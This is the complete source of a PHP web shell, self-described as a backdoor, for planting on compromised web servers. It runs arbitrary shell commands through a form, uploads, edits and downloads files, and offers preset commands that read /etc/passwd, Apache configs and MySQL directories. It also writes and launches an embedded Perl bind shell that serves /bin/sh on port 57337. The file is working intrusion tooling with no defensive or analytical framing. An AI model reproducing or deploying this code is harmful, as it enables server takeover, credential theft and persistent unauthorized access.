<? error_reporting(0); ################################ # PHP SHELL http-based-terminal # # by PHP SHELL # ################################ ?> <?$dir=realpath("./")."/"; $dir=str_replace("\\","/",$dir); ?> <? $dirfile="$file_to_download"; if (file_exists("$dirfile")) { header("location: $dirfile"); } ?> <title>PHP SHELL http-based-terminal - <? echo $dir?></title> <!-- PHP SHELL http-based-terminal - DANGEROUS GHOST` --> <style> BODY { margin-top: 1px; margin-right: 1px; margin-bottom: 1px; margin-left: 1px; } input { font-family: Verdana; font-size: 10px; color: black; background-color: #335F92; border: solid 2px; border-color: black } textarea { color: black; background-color: #335F92; border: solid 2px; border-color: black } select { background-color: #335F92; font: 10px verdana; } A:link {color:white; text-decoration: none } A:visited { color:white; text-decoration: none } A:active {color:white; text-decoration: none } A:hover {color:red; text-decoration: none } </style> <center> <table bgcolor=black cellspacing=1 width=100%><tr><td> <table bgcolor=#363d4e width=100%> <tr><td><center><b> <font size=-2 face=verdana color=red>n57http-based Terminal<br> <table width=100% heigth=0 cellpadding=0 cellspacing=0> <tr><td> </font> <font size=-2 face=verdana color=white> <form method=post> <font color=white> <b>::Exec command::</b><br> <input name=exec size=50% value='<?echo"$exec";?>'><br> <input name=dirname size=50% value='<? if ($dirname == "") {print "/tmp/";} else { echo"$dirname";}?>'> <?if($dirname !== "") { chdir($dirname);}?><br> <input type=submit value="..Exec.. "> </form> <form enctype="multipart/form-data" method=post> <b>::File upload::</b><br> <input name=userfile type=file size=50%><br> <input name=dirname size=50% value='<? if ($dirname == "") {print "/tmp/";} else { echo"$dirname";}?>'><Br> <input name=submit type=submit value=" Upload"> </form> <form method=post> <b>::Encode to md5,base64,Des::</b><br> <input name='chack' value='<?echo"$chack"?>' size=31><br> <? if ($chack == ""); else { echo "<font size=-2 face=verdana color=white><b>- $chack -</b></font><br>"; echo "<font size=-2 face=verdana color=white><b><u>MD5:</u></b> "; echo md5("$chack"); echo "<br></font>"; echo "<font size=-2 face=verdana color=white><b><u>Encode base64:</u></b> "; echo base64_encode("$chack"); echo "<br></font>"; echo "<font size=-2 face=verdana color=white><b><u>Decode base64:</u></b> "; echo base64_decode("$chack"); echo "<br></font>"; echo "<font size=-2 face=verdana color=white><b><u>DES:</u></b> "; echo crypt("$chack"); echo "<br></font>"; } ?> </form> </td><td valign=top><div align=right> <font size=-2 face=verdana color=white> <form method=post> <br><b>::Fast CMD::<Br></b><select size="1" name="runcmd"> <option value='1'>Find *-rw-* files</option> <option value='2'>Find all config files</option> <option value='3'>ps aux</option> <option value='4'>cat /etc/passwd</option> <option value='5'>cat /etc/httpd/conf/httpd.conf</option> <option value='6'>cat <dir>/conf/httpd.conf</option> <option value='7'>ls -la /var/lib/mysql/</option> <option value='8'>netstat -a</option> <option value='9'>perl --help</option> <option value='10'>gcc --help</option> <option value='11'>tar --help</option> <option selected>o...Select command...o</option> </select><br> <input type=submit value='...Exec...'></form> <form method=post> <b>::Edit/Create file::<br></b> <input name=editfile value='<? if ($dirname == "") {print "/tmp/file.txt";} else { echo"$dirname$editfile";}?>'> </form> <form method=post> <b>::Download file::<Br></b> <input name='file_to_download' value='<? if ($dirname == "") {print "/tmp/file.txt";} else { echo "$dirname","file.txt";}?>'><br> <input type=submit value=Download> </form> </div> </td></tr></table> <div align=left><font size=-2 face=verdana color=white> <table border=1 width=100%><tr><td> <font size=-2 face=verdana color=white> <b>Kernel: </b> <? passthru("uname -a");?> <br> <b>ID: </b> <? passthru("id");?><br> <b>Dir:</b> <? echo getcwd();?></div></td><td valign=top width=190><div align=right> <font size=-2 face=verdana color=white> <form method=post> If SafeMode is On, then use this: <input name=phpdir size=34 value='<? if ($phpdir == "") {print "/Directory";} else { echo"$phpdir";}?>'> </form> <? ######## perl shell ######### $perlshell = " #!/usr/bin/perl use Socket; #rintf \"BS9n\"; #lush(); +port= 57337; +proto= getprotobyname(\'tcp\'); +cmd= \"lpd\"; +system= \'echo \"(`whoami`@`uname -n`:`pwd`)\"; /bin/sh\'; +0 = +cmd; socket(SERVER, PF_INET, SOCK_STREAM, +proto) or die \"socket:$!\"; setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack(\"l\", 1)) or die \"setsockopt: $!\"; bind(SERVER, sockaddr_in(+port, INADDR_ANY)) or die \"bind: +!\"; listen(SERVER, SOMAXCONN)or die \"listen: +!\"; for(; +paddr = accept(CLIENT, SERVER); close CLIENT) { open(STDIN, \">&CLIENT\"); open(STDOUT, \">&CLIENT\"); open(STDERR, \">&CLIENT\"); system(+system); close(STDIN); close(STDOUT); close(STDERR); } "; ############# C++ shell ######### $cshell = " "; ?> </div></td></tr></table> </td></tr> <font size=-2 face=verdana color=white><B>Backdoor directory: <?echo $dir?></b> <tr><td> <? if($editfile == ""); else {echo ' <form method=post> <textarea name=editpost cols=70 rows=20>'; $filename = "$editfile"; $fd = fopen ($filename, "r"); $out = fread ($fd, filesize ($filename)); fclose ($fd); echo "$out"; echo '</textarea><br> <input name=editfile size=100% value=';echo $editfile;echo'> <input type=submit value=-Edit-><br> '; if ($editpost == ""); else { $editpost = str_replace("\\","",$editpost); $fp = fopen($editfile, w); fwrite($fp,"$editpost"); print "<center><font size=-2 face=verdana color=green><b>File <u>$editfile</u> edited/created success!</b></font><br></center>"; print "<a href=http://www.PHPshell.org target=_blank><font size=-2 face=verdana color=white><center>:: PHPshell.org http-based-terminal ::</a>"; print "</td></tr></table></td></tr></table>";exit; } ;} ?> <textarea name=terminal cols=121 rows=20> <? if($fileperl == "nst.pl") { $perlshell = str_replace("+","$",$perlshell); $perlshell = str_replace("\\","",$perlshell); $perlshell = str_replace("9","\\",$perlshell); $nst = fopen("/tmp/nst.pl", w); fwrite($nst, "$perlshell"); exec("perl /tmp/nst.pl"); echo "If perl exist, and no firewall on serv (etc), then you will got shell on port 57337"; } ?> <? if (($phpdir == "") or ($phpdir == "/Directory")); else { $dh = opendir($phpdir) or die("couldn't open directory"); while (!(($file = readdir($dh)) === false)) { if (is_dir("$phpdir/$file")) { print "\n[D] : "; } print "$file\n"; } closedir($dh);} ?> <? ### 4tobi dobavit kamandu, to dabavte jejo tut i smatrite vi6e ### tam gde <option> if($runcmd == "1") {passthru("find / -type f -perm -04000 -ls");} if($runcmd == "2") {passthru("locate config");} if($runcmd == "3") {passthru("ps aux");} if($runcmd == "4") {passthru("cat /etc/passwd");} if($runcmd == "5") {passthru("cat /etc/httpd/conf/httpd.conf");} if($runcmd == "6") {passthru("cat /usr/local/apache/conf/httpd.conf");} if($runcmd == "7") {passthru("ls -la /var/lib/mysql");} if($runcmd == "8") {passthru("netstat -a");} if($runcmd == "9") {passthru("perl --help");} if($runcmd == "10") {passthru("gcc --help");} if($runcmd == "11") {passthru("tar --help");} #if($runcmd == "12") {passthru("");} #if($runcmd == "13") {passthru("");} # etc.. ?> <? if (isset($submit)){ copy($userfile,$dirname.$userfile_name); if (!is_uploaded_file ($userfile)){ echo "$userfile_name can't upload"; } } if (is_uploaded_file ($userfile)){ echo "Uploaded to: $dirname$userfile_name\n\n"; } ?> <? if (($exec == "") or ($exec == "ls -la")) {print passthru("ls -la");} else passthru($exec); ?> </textarea> <table width=100% heigth=0 cellpadding=0 cellspacing=0><tr><td valign=top><form method=post> <font size=-2 face=verdana color=white> <b>Run backdoor on port 57337 <input type=hidden name=fileperl value='nst.pl'> <input type=submit value='Open'><br>[Perl] </b> </form></td><td valign=top><div align=right> <!-- <form method=post> --> <b><input type=submit value='Open'> <font size=-2 face=verdana color=white> <!-- <input type=hidden name=filec value='nst.c'> --> Run backdoor on port 57338<br></b>Soon <b>[C++]<sub></sub></b> <!-- </form> --> </div></td></tr></table> <? echo "<a href=http://www.PHPshell.org target=_blank><font size=-2 face=verdana><center>PHPshell.org http-based-terminal v1.0 </a>";?> </td></tr></table></td></tr></table>'; ?>